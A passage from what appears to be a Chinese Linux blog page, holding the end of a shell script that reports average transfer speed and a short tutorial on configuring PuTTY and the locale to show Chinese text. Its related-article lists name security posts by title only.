sum=$(($sumend-$sumfirst))
echo $sec” seconds total :”$sum”bytes”
aver=$(($sum/$sec))
echo “avrage :”$aver”bytes/sec”

相关文章

• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- 让putty支持中文输入和显示
• 2011年04月28日 -- 一次Linux下的普通渗透测试

打开putty主程序，选择window-〉Appearance-〉Font settings-〉Change…,选择Fixedsys字体,字符集选择CHINESE_GB2312。
在window-〉Appearance-〉Translation中，Received data assumed to be in which character set 中,把Use font encoding改为UTF-8.
如果经常使用,把这些设置保存在session里面.

现在打开putty,登录成功后,在shell中输入:export LC_ALL=’zh_CN.utf8′,现在已经可以完美的支持中文了
可以打开vim输入中文测试一下,而且也不会出现删除半个汉字的问题.

相关文章

• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月28日 -- 一次Linux下的普通渗透测试